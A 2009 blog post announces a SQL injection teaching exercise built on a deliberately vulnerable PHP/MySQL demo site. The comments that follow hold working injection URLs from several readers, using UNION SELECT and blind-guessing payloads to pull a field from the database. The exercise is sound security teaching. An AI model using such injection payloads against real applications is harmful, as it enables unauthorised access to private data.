Main menu:

Site search

Archives

RSS Arjen's Friendfeed

RSS Richard's del.icio.us links

RSS Maurits' Stumbled Items

Teach me SQL injection

Today I’ve given a SQL injection class at the VU University in Amsterdam. I’ve created a website that is vulnerable to SQL injection and I wanted to share this demo/assignment with you. Note that I’ve turned off magic_quotes_gpc to make life a little easier. The assignment is to find out my age. Whenever somebody has deleted the records in the database you can reset it. One hint: it runs on a PHP5/MySQL5 environment.

Application: http://server.maussoft.com/~sqlinject/list.php

Reset DB: http://server.maussoft.com/~sqlinject/reset.php

Can you hack this application? Try to do it without looking at the source code. Prove it and post an URL in the comments that injects SQL in such a way that the application shows my age. For the pro’s: try to do the same on safe1_view.php, safe2_view.php and insert.html/insert.php. If you can do the same on safe3_view.php or safe4_view.php you are officially 1337 in my book…

Maurits

Posted: April 14th, 2009 under Uncategorized.
Comments: 6

Comments

Comment from Nahuel
Time: April 20, 2009, 3:29

http://server.maussoft.com/~sqlinject/view.php?id=10%20union%20Select%20age,age,age,age%20FROM%20users%20WHERE%20id%20=%20%271%27–

http://server.maussoft.com/~sqlinject/safe1_view.php?id=10%27%20union%20Select%20age,age,age,age%20FROM%20users%20WHERE%20id%20=%20%271

And then I started to suck :(

Comment from maurits
Time: April 20, 2009, 9:55

@Nahuel: Congratulations on the first two! Hint: you can use the “Firebug”, “Tamper Data” and the “Web Developer Toolbar” addons on Firefox to help you with the others.

Comment from Simon
Time: May 12, 2009, 22:09

Third is also easy:

http://server.maussoft.com/~sqlinject/safe2_view.php?field=age&value=…test several values here

Not to hard when you know the result is an integer in range ~ 17-70.

No idea for the last two, though.

Comment from Alex Turpin
Time: June 15, 2009, 21:36

http://server.maussoft.com/~sqlinject/view.php?id=1%20AND%20age=??

Trial and error ftw.

Comment from maurits
Time: June 15, 2009, 21:50

@alex: Well done!! Now that it got you interested, how about the tougher ones?

Comment from dmitri
Time: July 1, 2009, 19:37

These are very easy.

for safe2_view.php:
http://server.maussoft.com/~sqlinject/safe2_view.php?field=id%60%20=%20-1%20UNION%20SELECT%20age,%20age,%20age,age%20from%20users%20WHERE%20%60id&value=1

will pull the age if you get the right ID which I’m presently too lazy to do.

Write a comment